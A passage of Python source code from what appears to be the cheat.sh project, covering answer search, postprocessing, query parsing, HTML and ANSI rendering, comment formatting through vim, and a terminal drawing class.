skip_dirs=True): if not topic.startswith(directory): continue subtopic = topic[len(directory):] if not options_dict["recursive"] and '/' in subtopic: continue answer_dicts = get_answers(topic, request_options=request_options) for answer_dict in answer_dicts: answer_text = answer_dict.get('answer', '') # Temporary hotfix: # In some cases answer_text may be 'bytes' and not 'str' if type(b"") == type(answer_text): answer_text = answer_text.decode("utf-8") if match(answer_text, keyword, options_dict=options_dict): answers_found.append(answer_dict) if len(answers_found) > CONFIG['search.limit']: answers_found.append( _limited_entry() ) break return answers_found File: lib/postprocessing.py import search import fmt.comments def postprocess(answer, keyword, options, request_options=None): answer = _answer_add_comments(answer, request_options=request_options) answer = _answer_filter_by_keyword(answer, keyword, options, request_options=request_options) return answer def _answer_add_comments(answer, request_options=None): if answer['format'] != 'text+code': return answer topic = answer['topic'] if "filetype" in answer: filetype = answer["filetype"] else: filetype = 'bash' if '/' in topic: filetype = topic.split('/', 1)[0] if filetype.startswith('q:'): filetype = filetype[2:] answer['answer'] = fmt.comments.beautify( answer['answer'], filetype, request_options) answer['format'] = 'code' answer['filetype'] = filetype return answer def _answer_filter_by_keyword(answer, keyword, options, request_options=None): answer['answer'] = _filter_by_keyword(answer['answer'], keyword, options) return answer def _filter_by_keyword(answer, keyword, options): def _join_paragraphs(paragraphs): answer = "\n".join(paragraphs) return answer def _split_paragraphs(text): answer = [] paragraph = "" if isinstance(text, bytes): text = text.decode("utf-8") for line in text.splitlines(): if line == "": answer.append(paragraph) paragraph = "" else: paragraph += line+"\n" 
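        # flush the last paragraph: the text may not end with an empty line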
answer.append(paragraph) return answer paragraphs = [p for p in _split_paragraphs(answer) if search.match(p, keyword, options=options)] if not paragraphs: return "" return _join_paragraphs(paragraphs) File: lib/cheat_wrapper.py """ Main cheat.sh wrapper. Parse the query, get answers from getters (using get_answer), visualize it using frontends and return the result. Exports: cheat_wrapper() """ import re import json from routing import get_answers, get_topics_list from search import find_answers_by_keyword from languages_data import LANGUAGE_ALIAS, rewrite_editor_section_name import postprocessing import frontend.html import frontend.ansi def _add_section_name(query): # temporary solution before we don't find a fixed one if ' ' not in query and '+' not in query: return query if '/' in query: return query if ' ' in query: return re.sub(r' +', '/', query, count=1) if '+' in query: # replace only single + to avoid catching g++ and friends return re.sub(r'([^\+])\+([^\+])', r'\1/\2', query, count=1) def cheat_wrapper(query, request_options=None, output_format='ansi'): """ Function that delivers cheat sheet for `query`. If `html` is True, the answer is formatted as HTML. Additional request options specified in `request_options`. """ def _rewrite_aliases(word): if word == ':bash.completion': return ':bash_completion' return word def _rewrite_section_name(query): """ Rewriting special section names: * EDITOR:NAME => emacs:go-mode """ if '/' not in query: return query section_name, rest = query.split('/', 1) if ':' in section_name: section_name = rewrite_editor_section_name(section_name) section_name = LANGUAGE_ALIAS.get(section_name, section_name) return "%s/%s" % (section_name, rest) def _sanitize_query(query): return re.sub('[<>"]', '', query) def _strip_hyperlink(query): return re.sub('(,[0-9]+)+$', '', query) def _parse_query(query): topic = query keyword = None search_options = "" keyword = None if '~' in query: topic = query pos = topic.index('~') keyword = topic[pos+1:] topic = topic[:pos] if '/' in keyword: search_options = keyword[::-1] search_options = search_options[:search_options.index('/')] keyword = keyword[:-len(search_options)-1] return topic, keyword, search_options query = _sanitize_query(query) query = _add_section_name(query) query = _rewrite_aliases(query) query = _rewrite_section_name(query) # at the moment, we just remove trailing slashes # so queries python/ and python are equal # query = _strip_hyperlink(query.rstrip('/')) topic, keyword, search_options = _parse_query(query) if keyword: answers = find_answers_by_keyword( topic, keyword, options=search_options, request_options=request_options) else: answers = get_answers(topic, request_options=request_options) answers = [ postprocessing.postprocess( answer, keyword, search_options, request_options=request_options) for answer in answers ] answer_data = { 'query': query, 'keyword': keyword, 'answers': answers, } if output_format == 'html': answer_data['topics_list'] = get_topics_list() return frontend.html.visualize(answer_data, request_options) elif output_format == 'json': return json.dumps(answer_data, indent=4) return frontend.ansi.visualize(answer_data, request_options) File: lib/frontend/html.py """ Configuration parameters: path.internal.ansi2html """ import sys import os import re from subprocess import Popen, PIPE MYDIR = os.path.abspath(os.path.join(__file__, '..', '..')) sys.path.append("%s/lib/" % MYDIR) # pylint: disable=wrong-import-position from config import CONFIG from globals import error from buttons 
import TWITTER_BUTTON, GITHUB_BUTTON, GITHUB_BUTTON_FOOTER import frontend.ansi # temporary having it here, but actually we have the same data # in the adapter module GITHUB_REPOSITORY = { "late.nz" : 'chubin/late.nz', "cheat.sheets" : 'chubin/cheat.sheets', "cheat.sheets dir" : 'chubin/cheat.sheets', "tldr" : 'tldr-pages/tldr', "cheat" : 'chrisallenlane/cheat', "learnxiny" : 'adambard/learnxinyminutes-docs', "internal" : '', "search" : '', "unknown" : '', } def visualize(answer_data, request_options): query = answer_data['query'] answers = answer_data['answers'] topics_list = answer_data['topics_list'] editable = (len(answers) == 1 and answers[0]['topic_type'] == 'cheat.sheets') repository_button = '' if len(answers) == 1: repository_button = _github_button(answers[0]['topic_type']) result, found = frontend.ansi.visualize(answer_data, request_options) return _render_html(query, result, editable, repository_button, topics_list, request_options), found def _github_button(topic_type): full_name = GITHUB_REPOSITORY.get(topic_type, '') if not full_name: return '' short_name = full_name.split('/', 1)[1] # pylint: disable=unused-variable button = ( "<!-- Place this tag where you want the button to render. -->" '<a aria-label="Star %(full_name)s on GitHub"' ' data-count-aria-label="# stargazers on GitHub"' ' data-count-api="/repos/%(full_name)s#stargazers_count"' ' data-count-href="/%(full_name)s/stargazers"' ' data-icon="octicon-star"' ' href="https://github.com/%(full_name)s"' ' class="github-button">%(short_name)s</a>' ) % locals() return button def _render_html(query, result, editable, repository_button, topics_list, request_options): def _html_wrapper(data): """ Convert ANSI text `data` to HTML """ cmd = ["bash", CONFIG['path.internal.ansi2html'], "--palette=solarized", "--bg=dark"] try: proc = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE) except FileNotFoundError: print("ERROR: %s" % cmd) raise data = data.encode('utf-8') stdout, stderr = proc.communicate(data) if proc.returncode != 0: error((stdout + stderr).decode('utf-8')) return stdout.decode('utf-8') result = result + "\n$" result = _html_wrapper(result) title = "<title>cheat.sh/%s</title>" % query submit_button = ('<input type="submit" style="position: absolute;' ' left: -9999px; width: 1px; height: 1px;" tabindex="-1" />') topic_list = ('<datalist id="topics">%s</datalist>' % ("\n".join("<option value='%s'></option>" % x for x in topics_list))) curl_line = "<span class='pre'>$ curl cheat.sh/</span>" if query == ':firstpage': query = "" form_html = ('<form action="/" method="GET">' '%s%s' '<input' ' type="text" value="%s" name="topic"' ' list="topics" autofocus autocomplete="off"/>' '%s' '</form>') \ % (submit_button, curl_line, query, topic_list) edit_button = '' if editable: # It's possible that topic directory starts with omitted underscore if '/' in query: query = '_' + query edit_page_link = 'https://github.com/chubin/cheat.sheets/edit/master/sheets/' + query edit_button = ( '<pre style="position:absolute;padding-left:40em;overflow:visible;height:0;">' '[<a href="%s" style="color:cyan">edit</a>]' '</pre>') % edit_page_link result = re.sub("<pre>", edit_button + form_html + "<pre>", result) result = re.sub("<head>", "<head>" + title, result) if not request_options.get('quiet'): result = result.replace('</body>', TWITTER_BUTTON \ + GITHUB_BUTTON \ + repository_button \ + GITHUB_BUTTON_FOOTER \ + '</body>') return result File: lib/frontend/__init__.py File: lib/frontend/ansi.py """ ANSI frontend. 
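Renders answer dictionaries as ANSI-colored terminal output, using Pygments
for syntax highlighting of code and colored for the section headers shown
when several answers are returned.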
Exports: visualize(answer_data, request_options) Format: answer_data = { 'answers': '...',} answers = [answer,...] answer = { 'topic': '...', 'topic_type': '...', 'answer': '...', 'format': 'ansi|code|markdown|text...', } Configuration parameters: frontend.styles """ import os import sys import re import colored from pygments import highlight as pygments_highlight from pygments.formatters import Terminal256Formatter # pylint: disable=no-name-in-module # pylint: disable=wrong-import-position sys.path.append(os.path.abspath(os.path.join(__file__, '..'))) from config import CONFIG import languages_data # pylint: enable=wrong-import-position import fmt.internal import fmt.comments def visualize(answer_data, request_options): """ Renders `answer_data` as ANSI output. """ answers = answer_data['answers'] return _visualize(answers, request_options, search_mode=bool(answer_data['keyword'])) ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]') def remove_ansi(sometext): """ Remove ANSI sequences from `sometext` and convert it into plaintext. """ return ANSI_ESCAPE.sub('', sometext) def _limited_answer(answer): return colored.bg('dark_goldenrod') + colored.fg('yellow_1') \ + ' ' + answer + ' ' \ + colored.attr('reset') + "\n" def _colorize_ansi_answer(topic, answer, color_style, # pylint: disable=too-many-arguments highlight_all=True, highlight_code=False, unindent_code=False, language=None): color_style = color_style or "native" lexer_class = languages_data.LEXER['bash'] if '/' in topic: if language is None: section_name = topic.split('/', 1)[0].lower() else: section_name = language section_name = languages_data.get_lexer_name(section_name) lexer_class = languages_data.LEXER.get(section_name, lexer_class) if section_name == 'php': answer = "<?\n%s?>\n" % answer if highlight_all: highlight = lambda answer: pygments_highlight( answer, lexer_class(), Terminal256Formatter(style=color_style)).strip('\n')+'\n' else: highlight = lambda x: x if highlight_code: blocks = fmt.comments.code_blocks( answer, wrap_lines=True, unindent_code=(4 if unindent_code else False)) highlighted_blocks = [] for block in blocks: if block[0] == 1: this_block = highlight(block[1]) else: this_block = block[1].strip('\n')+'\n' highlighted_blocks.append(this_block) result = "\n".join(highlighted_blocks) else: result = highlight(answer).lstrip('\n') return result def _visualize(answers, request_options, search_mode=False): highlight = not bool(request_options and request_options.get('no-terminal')) color_style = (request_options or {}).get('style', '') if color_style not in CONFIG['frontend.styles']: color_style = '' # if there is more than one answer, # show the source of the answer multiple_answers = len(answers) > 1 found = True result = "" for answer_dict in answers: topic = answer_dict['topic'] topic_type = answer_dict['topic_type'] answer = answer_dict['answer'] found = found and not topic_type == 'unknown' if multiple_answers and topic != 'LIMITED': section_name = f"{topic_type}:{topic}" if not highlight: result += f"#[{section_name}]\n" else: result += "".join([ "\n", colored.bg('dark_gray'), colored.attr("res_underlined"), f" {section_name} ", colored.attr("res_underlined"), colored.attr('reset'), "\n"]) if answer_dict['format'] in ['ansi', 'text']: result += answer elif topic == ':firstpage-v1': result += fmt.internal.colorize_internal_firstpage_v1(answer) elif topic == 'LIMITED': result += _limited_answer(topic) else: result += _colorize_ansi_answer( topic, answer, color_style, highlight_all=highlight, 
highlight_code=(topic_type == 'question' and not request_options.get('add_comments') and not request_options.get('remove_text')), language=answer_dict.get("filetype")) if request_options.get('no-terminal'): result = remove_ansi(result) result = result.strip('\n') + "\n" return result, found File: lib/fmt/internal.py """ Colorize internal cheat sheets. Will be merged with panela later. """ import re from colorama import Fore, Back, Style import colored PALETTES = { 0: { 1: Fore.WHITE, 2: Style.DIM, }, 1: { 1: Fore.CYAN, 2: Fore.GREEN, 3: colored.fg('orange_3'), 4: Style.DIM, 5: Style.DIM, }, 2: { 1: Fore.RED, 2: Style.DIM, }, } def _reverse_palette(code): return { 1 : Fore.BLACK + _back_color(code), 2 : Style.DIM } def _back_color(code): if code == 0 or (isinstance(code, str) and code.lower() == "white"): return Back.WHITE if code == 1 or (isinstance(code, str) and code.lower() == "cyan"): return Back.CYAN if code == 2 or (isinstance(code, str) and code.lower() == "red"): return Back.RED return Back.WHITE def colorize_internal(text, palette_number=1): """ Colorize `text`, use `palette` """ palette = PALETTES[palette_number] palette_reverse = _reverse_palette(palette_number) def _process_text(text): text = text.group()[1:-1] factor = 1 if text.startswith('-'): text = text[1:] factor = -1 stripped = text.lstrip('0123456789') return (text, stripped, factor) def _extract_color_number(text, stripped, factor=1): return int(text[:len(text)-len(stripped)])*factor def _colorize_curlies_block(text): text, stripped, factor = _process_text(text) color_number = _extract_color_number(text, stripped, factor) if stripped.startswith('='): stripped = stripped[1:] reverse = (color_number < 0) if reverse: color_number = -color_number if reverse: stripped = palette_reverse[color_number] + stripped + Style.RESET_ALL else: stripped = palette[color_number] + stripped + Style.RESET_ALL return stripped def _colorize_headers(text): if text.group(0).endswith('\n'): newline = '\n' else: newline = '' color_number = 3 return palette[color_number] + text.group(0).strip() + Style.RESET_ALL + newline text = re.sub("{.*?}", _colorize_curlies_block, text) text = re.sub("#(.*?)\n", _colorize_headers, text) return text def colorize_internal_firstpage_v1(answer): """ Colorize "/:firstpage-v1". Legacy. """ def _colorize_line(line): if line.startswith('T'): line = colored.fg("grey_62") + line + colored.attr('reset') line = re.sub(r"\{(.*?)\}", colored.fg("orange_3") + r"\1"+colored.fg('grey_35'), line) return line line = re.sub(r"\[(F.*?)\]", colored.bg("black") + colored.fg("cyan") + r"[\1]"+colored.attr('reset'), line) line = re.sub(r"\[(g.*?)\]", colored.bg("dark_gray")+colored.fg("grey_0")+r"[\1]"+colored.attr('reset'), line) line = re.sub(r"\{(.*?)\}", colored.fg("orange_3") + r"\1"+colored.attr('reset'), line) line = re.sub(r"<(.*?)>", colored.fg("cyan") + r"\1"+colored.attr('reset'), line) return line lines = answer.splitlines() answer_lines = lines[:9] answer_lines.append(colored.fg('grey_35')+lines[9]+colored.attr('reset')) for line in lines[10:]: answer_lines.append(_colorize_line(line)) answer = "\n".join(answer_lines) + "\n" return answer File: lib/fmt/__init__.py File: lib/fmt/markdown.py """ Markdown support. Exports: format_text(text, config=None, highlighter=None): Uses external pygments formatters for highlighting (passed as an argument). """ import re import ansiwrap import colored def format_text(text, config=None, highlighter=None): """ Renders `text` according to markdown rules. 
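    Only a small subset of markdown is handled: fenced code blocks are cut
    out (replaced with placeholders), [text](url) links are reduced to their
    text, `inline code` and **bold** spans are colorized, and paragraphs are
    re-wrapped with ansiwrap.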
Uses `highlighter` for syntax highlighting. Returns a dictionary with "output" and "links". """ return _format_section(text, config=config, highlighter=highlighter) def _split_into_paragraphs(text): return re.split('\n\n+', text) def _colorize(text): return \ re.sub( r"`(.*?)`", colored.bg("dark_gray") \ + colored.fg("white") \ + " " + r"\1" + " " \ + colored.attr('reset'), re.sub( r"\*\*(.*?)\*\*", colored.attr('bold') \ + colored.fg("white") \ + r"\1" \ + colored.attr('reset'), text)) def _format_section(section_text, config=None, highlighter=None): answer = '' # cut code blocks block_number = 0 while True: section_text, replacements = re.subn( '^```.*?^```', 'MULTILINE_BLOCK_%s' % block_number, section_text, 1, flags=re.S | re.MULTILINE) block_number += 1 if not replacements: break # cut links links = [] while True: regexp = re.compile(r'\[(.*?)\]\((.*?)\)') match = regexp.search(section_text) if match: links.append(match.group(0)) text = match.group(1) # links are not yet supported # text = '\x1B]8;;%s\x1B\\\\%s\x1B]8;;\x1B\\\\' % (match.group(2), match.group(1)) else: break section_text, replacements = regexp.subn( text, # 'LINK_%s' % len(links), section_text, 1) block_number += 1 if not replacements: break for paragraph in _split_into_paragraphs(section_text): answer += "\n".join( ansiwrap.fill(_colorize(line)) + "\n" for line in paragraph.splitlines()) + "\n" return { 'ansi': answer, 'links': links } File: lib/fmt/comments.py """ Extract text from the text-code stream and comment it. Supports three modes of normalization and commenting: 1. Don't add any comments 2. Add comments 3. Remove text, leave code only Since several operations are quite expensive, it actively uses caching. Exported functions: beautify(text, lang, options) code_blocks(text) Configuration parameters: """ from __future__ import print_function import sys import os import textwrap import hashlib import re from itertools import groupby, chain from subprocess import Popen from tempfile import NamedTemporaryFile from config import CONFIG from languages_data import VIM_NAME import cache FNULL = open(os.devnull, 'w') TEXT = 0 CODE = 1 UNDEFINED = -1 CODE_WHITESPACE = -2 def _language_name(name): return VIM_NAME.get(name, name) def _remove_empty_lines_from_beginning(lines): start = 0 while start < len(lines) and lines[start].strip() == '': start += 1 lines = lines[start:] return lines def _remove_empty_lines_from_end(lines): end = len(lines) - 1 while end >= 0 and lines[end].strip() == '': end -= 1 lines = lines[:end+1] return lines def _cleanup_lines(lines): """ Cleanup `lines` a little bit: remove empty lines at the beginning and at the end; remove too many empty lines in between. """ lines = _remove_empty_lines_from_beginning(lines) lines = _remove_empty_lines_from_end(lines) if lines == []: return lines # remove repeating empty lines lines = list(chain.from_iterable( [(list(x[1]) if x[0] else ['']) for x in groupby(lines, key=lambda x: x.strip() != '')])) return lines def _line_type(line): """ Classify each line and say which of them are text (0) and which of them are code (1). A line is considered to be code, if it starts with four spaces. A line is considerer to be text if it is not empty and is not code. If line is empty, it is considered to be code if it surrounded but two other code lines, or if it is the first/last line and it has code on the other side. """ if line.strip() == '': return UNDEFINED # some line may start with spaces but still be not code. 
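    # (for example, "* " bullets and "1."-style numbered items may be indented but are still text)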
# we need some heuristics here, but for the moment just # whitelist such cases: if line.strip().startswith('* ') or re.match(r'[0-9]+\.', line.strip()): return TEXT if line.startswith(' '): return CODE return TEXT def _classify_lines(lines): line_types = [_line_type(line) for line in lines] # pass 2: # adding empty code lines to the code for i in range(len(line_types) - 1): if line_types[i] == CODE and line_types[i+1] == UNDEFINED: line_types[i+1] = CODE_WHITESPACE changed = True for i in range(len(line_types) - 1)[::-1]: if line_types[i] == UNDEFINED and line_types[i+1] == CODE: line_types[i] = CODE_WHITESPACE changed = True line_types = [CODE if x == CODE_WHITESPACE else x for x in line_types] # pass 3: # fixing undefined line types (-1) changed = True while changed: changed = False # changing all lines types that are near the text for i in range(len(line_types) - 1): if line_types[i] == TEXT and line_types[i+1] == UNDEFINED: line_types[i+1] = TEXT changed = True for i in range(len(line_types) - 1)[::-1]: if line_types[i] == UNDEFINED and line_types[i+1] == TEXT: line_types[i] = TEXT changed = True # everything what is still undefined, change to code type line_types = [CODE if x == UNDEFINED else x for x in line_types] return line_types def _unindent_code(line, shift=0): if shift == -1 and line != '': return ' ' + line if shift > 0 and line.startswith(' '*shift): return line[shift:] return line def _wrap_lines(lines_classes, unindent_code=False): """ Wrap classified lines. Add the split lines to the stream. If `unindent_code` is True, remove leading four spaces. """ result = [] for line_type, line_content in lines_classes: if line_type == CODE: shift = 3 if unindent_code else -1 result.append((line_type, _unindent_code(line_content, shift=shift))) else: if line_content.strip() == "": result.append((line_type, "")) for line in textwrap.fill(line_content).splitlines(): result.append((line_type, line)) return result def _run_vim_script(script_lines, text_lines): """ Apply `script_lines` to `lines_classes` and returns the result """ script_vim = NamedTemporaryFile(delete=True) textfile = NamedTemporaryFile(delete=True) open(script_vim.name, "w").write("\n".join(script_lines)) open(textfile.name, "w").write("\n".join(text_lines)) script_vim.file.close() textfile.file.close() my_env = os.environ.copy() my_env['HOME'] = CONFIG["path.internal.vim"] cmd = ["script", "-q", "-c", "vim -S %s %s" % (script_vim.name, textfile.name)] Popen(cmd, shell=False, stdin=open(os.devnull, 'r'), stdout=FNULL, stderr=FNULL, env=my_env).communicate() return open(textfile.name, "r").read() def _commenting_script(lines_blocks, filetype): script_lines = [] block_start = 1 for block in lines_blocks: lines = list(block[1]) block_end = block_start + len(lines)-1 if block[0] == 0: comment_type = 'sexy' if block_end - block_start < 1 or filetype == 'ruby': comment_type = 'comment' script_lines.insert(0, "%s,%s call NERDComment(1, '%s')" % (block_start, block_end, comment_type)) script_lines.insert(0, "%s,%s call NERDComment(1, 'uncomment')" % (block_start, block_end)) block_start = block_end + 1 script_lines.insert(0, "set ft=%s" % _language_name(filetype)) script_lines.append("wq") return script_lines def _beautify(text, filetype, add_comments=False, remove_text=False): """ Main function that actually does the whole beautification job. """ # We shift the code if and only if we either convert the text into comments # or remove the text completely. 
Otherwise the code has to remain aligned unindent_code = add_comments or remove_text lines = [x.decode("utf-8").rstrip('\n') for x in text.splitlines()] lines = _cleanup_lines(lines) lines_classes = zip(_classify_lines(lines), lines) lines_classes = _wrap_lines(lines_classes, unindent_code=unindent_code) if remove_text: lines = [line[1] for line in lines_classes if line[0] == 1] lines = _cleanup_lines(lines) output = "\n".join(lines) if not output.endswith('\n'): output += "\n" elif not add_comments: output = "\n".join(line[1] for line in lines_classes) else: lines_blocks = groupby(lines_classes, key=lambda x: x[0]) script_lines = _commenting_script(lines_blocks, filetype) output = _run_vim_script( script_lines, [line for (_, line) in lines_classes]) return output def code_blocks(text, wrap_lines=False, unindent_code=False): """ Split `text` into blocks of text and code. Return list of tuples TYPE, TEXT """ text = text.encode('utf-8') lines = [x.rstrip('\n') for x in text.splitlines()] lines_classes = zip(_classify_lines(lines), lines) if wrap_lines: lines_classes = _wrap_lines(lines_classes, unindent_code=unindent_code) lines_blocks = groupby(lines_classes, key=lambda x: x[0]) answer = [(x[0], "\n".join([y[1] for y in x[1]])+"\n") for x in lines_blocks] return answer def beautify(text, lang, options): """ Process input `text` according to the specified `mode`. Adds comments if needed, according to the `lang` rules. Caches the results. The whole work (except caching) is done by _beautify(). """ options = options or {} beauty_options = dict((k, v) for k, v in options.items() if k in ['add_comments', 'remove_text']) mode = '' if beauty_options.get('add_comments'): mode += 'c' if beauty_options.get('remove_text'): mode += 'q' if beauty_options == {}: # if mode is unknown, just don't transform the text at all return text if isinstance(text, str): text = text.encode('utf-8') digest = "t:%s:%s:%s" % (hashlib.md5(text).hexdigest(), lang, mode) # temporary added line that removes invalid cache entries # that used wrong commenting methods if lang in ["git", "django", "flask", "cmake"]: cache.delete(digest) answer = cache.get(digest) if answer: return answer answer = _beautify(text, lang, **beauty_options) cache.put(digest, answer) return answer def __main__(): text = sys.stdin.read() filetype = sys.argv[1] options = { "": {}, "c": dict(add_comments=True), "C": dict(add_comments=False), "q": dict(remove_text=True), }[sys.argv[2]] result = beautify(text, filetype, options) sys.stdout.write(result) if __name__ == '__main__': __main__() File: lib/panela/panela_colors.py # vim: encoding=utf-8 import os import sys import colored import itertools from globals import MYDIR """ After panela will be ready for it, it will be split out in a separate project, that will be used for all chubin's console services. 
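A minimal usage sketch (illustrative only; see the Panela class below for the
full API, and note that parts of the class still target Python 2):

    canvas = Panela(x=40, y=10)
    canvas.put_rectangle(0, 0, 39, 9, frame="single", color="#888888")
    canvas.put_string(2, 1, "hello", color="#00cc00")
    sys.stdout.write(str(canvas))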
There are several features that not yet implemented (see ___doc___ in Panela) TODO: * html output * png output """ from wcwidth import wcswidth from colors import find_nearest_color, HEX_TO_ANSI, rgb_from_str import pyte # http://stackoverflow.com/questions/19782975/convert-rgb-color-to-the-nearest-color-in-palette-web-safe-color try: basestring # Python 2 except NameError: basestring = str # Python 3 def color_mapping(clr): if clr == 'default': return None return clr class Point(object): """ One point (character) on a terminal """ def __init__(self, char=None, foreground=None, background=None): self.foreground = foreground self.background = background self.char = char class Panela: """ To implement: Blocks manipulation: [*] copy [*] crop [*] cut [*] extend [ ] join [ ] move [*] paste [*] strip Colors manipulation: [*] paint foreground/background [*] paint_line [ ] paint_svg [ ] fill background [ ] fill_line [ ] fill_svg [ ] trans Drawing: [*] put_point [*] put_line [*] put_circle [*] put_rectangle Printing and reading: ansi reads vt100 sequence """ def __init__(self, x=80, y=25, panela=None, field=None): if panela: self.field = [x for x in panela.field] self.size_x = panela.size_x self.size_y = panela.size_y return if field: self.field = field self.size_x = len(field[0]) self.size_y = len(field) return self.field = [[Point() for _ in range(x)] for _ in range(y)] self.size_x = x self.size_y = y def in_field(self, col, row): if col < 0: return False if row < 0: return False if col >= self.size_x: return False if row >= self.size_y: return False return True # # Blocks manipulation # def copy(self, x1, y1, x2, y2): if x1 < 0: x1 += self.size_x if x2 < 0: x2 += self.size_x if x1 > x2: x1, x2 = x2, x1 if y1 < 0: y1 += self.size_y if y2 < 0: y2 += self.size_y if y1 > y2: y1, y2 = y2, y1 field = [self.field[i] for i in range(y1, y2+1)] field = [line[x1:x2+1] for line in field] return Panela(field=field) def cut(self, x1, y1, x2, y2): """ """ if x1 < 0: x1 += self.size_x if x2 < 0: x2 += self.size_x if x1 > x2: x1, x2 = x2, x1 if y1 < 0: y1 += self.size_y if y2 < 0: y2 += self.size_y if y1 > y2: y1, y2 = y2, y1 copied = self.copy(x1, y1, x2, y2) for y in range(y1, y2+1): for x in range(x1, x2+1): self.field[y][x] = Point() return copied def extend(self, cols=None, rows=None): """ Adds [cols] columns from the right and [rows] rows from the bottom """ if cols and cols > 0: self.field = [x + [Point() for _ in range(cols)] for x in self.field] self.size_x += cols if rows and rows > 0: self.field = self.field + [[Point() for _ in range(self.size_x)] for _ in range(rows)] self.size_y += rows def crop(self, left=None, right=None, top=None, bottom=None): """ Crop panela. Remove <left>, <right> columns from left or right, and <top> and <bottom> rows from top and bottom. """ if left: if left >= self.size_x: left = self.size_x self.field = [x[left:] for x in self.field] self.size_x -= left if right: if right >= self.size_x: right = self.size_x self.field = [x[:-right] for x in self.field] self.size_x -= right if top: if top >= self.size_y: top = self.size_y self.field = self.field[top:] self.size_y -= top if bottom: if bottom >= self.size_y: bottom = self.size_y self.field = self.field[:-bottom] self.size_y -= bottom def paste(self, panela, x1, y1, extend=False, transparence=False): """ Paste <panela> starting at <x1>, <y1>. 
If <extend> is True current panela space will be automatically extended If <transparence> is True, then <panela> is overlaid and characters behind them are seen """ # FIXME: # negative x1, y1 # x1,y1 > size_x, size_y if extend: x_extend = 0 y_extend = 0 if x1 + panela.size_x > self.size_x: x_extend = x1 + panela.size_x - self.size_x if y1 + panela.size_y > self.size_y: y_extend = y1 + panela.size_y - self.size_y self.extend(cols=x_extend, rows=y_extend) for i in range(y1, min(self.size_y, y1+panela.size_y)): for j in range(x1, min(self.size_x, x1+panela.size_x)): if transparence: if panela.field[i-y1][j-x1].char and panela.field[i-y1][j-x1].char != " ": if panela.field[i-y1][j-x1].foreground: self.field[i][j].foreground = panela.field[i-y1][j-x1].foreground if panela.field[i-y1][j-x1].background: self.field[i][j].background = panela.field[i-y1][j-x1].background self.field[i][j].char = panela.field[i-y1][j-x1].char else: self.field[i][j] = panela.field[i-y1][j-x1] def strip(self): """ Strip panela: remove empty spaces around panels rectangle """ def left_spaces(line): answer = 0 for elem in line: if not elem.char: answer += 1 else: break return answer def right_spaces(line): return left_spaces(line[::-1]) def empty_line(line): return left_spaces(line) == len(line) left_space = [] right_space = [] for line in self.field: left_space.append(left_spaces(line)) right_space.append(right_spaces(line)) left = min(left_space) right = min(right_space) top = 0 while top < self.size_y and empty_line(self.field[top]): top += 1 bottom = 0 while bottom < self.size_y and empty_line(self.field[-(bottom+1)]): bottom += 1 self.crop(left=left, right=right, top=top, bottom=bottom) # # Drawing and painting # def put_point(self, col, row, char=None, color=None, background=None): """ Puts character with color and background color on the field. Char can be a Point or a character. """ if not self.in_field(col, row): return if isinstance(char, Point): self.field[row][col] = char elif char is None: if background: self.field[row][col].background = background if color: self.field[row][col].foreground = color else: self.field[row][col] = Point(char=char, foreground=color, background=background) def put_string(self, col, row, s=None, color=None, background=None): """ Put string <s> with foreground color <color> and background color <background> ad <col>, <row> """ for i, c in enumerate(s): self.put_point(col+i, row, c, color=color, background=background) def put_line(self, x1, y1, x2, y2, char=None, color=None, background=None): """ Draw line (x1, y1) - (x2, y2) fith foreground color <color>, background color <background> and character <char>, if specified. 
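        A small illustrative call (names are made up):

            canvas.put_line(0, 0, 10, 4, char="*", color="#cccc00")

        draws a line of "*" characters from (0, 0) to (10, 4) using
        Bresenham's algorithm (see get_line below).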
""" def get_line(start, end): """Bresenham's Line Algorithm Produces a list of tuples from start and end Source: http://www.roguebasin.com/index.php?title=Bresenham%27s_Line_Algorithm#Python >>> points1 = get_line((0, 0), (3, 4)) >>> points2 = get_line((3, 4), (0, 0)) >>> assert(set(points1) == set(points2)) >>> print points1 [(0, 0), (1, 1), (1, 2), (2, 3), (3, 4)] >>> print points2 [(3, 4), (2, 3), (1, 2), (1, 1), (0, 0)] """ # Setup initial conditions x1, y1 = start x2, y2 = end dx = x2 - x1 dy = y2 - y1 # Determine how steep the line is is_steep = abs(dy) > abs(dx) # Rotate line if is_steep: x1, y1 = y1, x1 x2, y2 = y2, x2 # Swap start and end points if necessary and store swap state swapped = False if x1 > x2: x1, x2 = x2, x1 y1, y2 = y2, y1 swapped = True # Recalculate differentials dx = x2 - x1 dy = y2 - y1 # Calculate error error = int(dx / 2.0) ystep = 1 if y1 < y2 else -1 # Iterate over bounding box generating points between start and end y = y1 points = [] for x in range(x1, x2 + 1): coord = (y, x) if is_steep else (x, y) points.append(coord) error -= abs(dy) if error < 0: y += ystep error += dx # Reverse the list if the coordinates were swapped if swapped: points.reverse() return points if color and not isinstance(color, basestring): color_iter = itertools.cycle(color) else: color_iter = itertools.repeat(color) if background and not isinstance(background, basestring): background_iter = itertools.cycle(background) else: background_iter = itertools.repeat(background) if char: char_iter = itertools.cycle(char) else: char_iter = itertools.repeat(char) for x, y in get_line((x1,y1), (x2, y2)): char = next(char_iter) color = next(color_iter) background = next(background_iter) self.put_point(x, y, char=char, color=color, background=background) def paint(self, x1, y1, x2, y2, c1, c2=None, bg1=None, bg2=None, angle=None, angle_bg=None): """ Paint rectangle (x1,y1) (x2,y2) with foreground color c1 and background bg1 if specified. If spefied colors c2/bg2, rectangle is painted with linear gradient (inclined under angle). 
